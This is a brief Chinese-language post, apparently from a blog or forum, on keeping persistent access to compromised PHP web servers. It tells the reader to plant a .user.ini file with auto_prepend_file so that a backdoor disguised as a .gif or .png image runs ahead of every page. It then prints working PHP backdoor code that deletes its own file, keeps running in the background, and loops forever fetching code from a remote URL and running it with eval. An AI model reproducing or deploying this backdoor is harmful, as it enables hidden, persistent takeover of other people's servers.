1、通过php.ini或者user.ini留后门 在一个有正常php文件的目录下新建一个.user.ini 内容为auto_prepend_file=xxx.gif(png/jpg)之类 而你的xxx.gif之类就是你的后门 2、后门的代码第一行删除自身,然后驻留在后台内存里,等待外部链接 <?phpunlink($_SERVER[‘SCRIPT_FILENAME‘]);ignore_user_abort(true);set_time_limit(0);$remote_file = ‘http://xxx/xxx.txt‘;while($code = file_get_contents($remote_file)){@eval($code);sleep(5);};?>
时间: 2024-10-08 10:28:07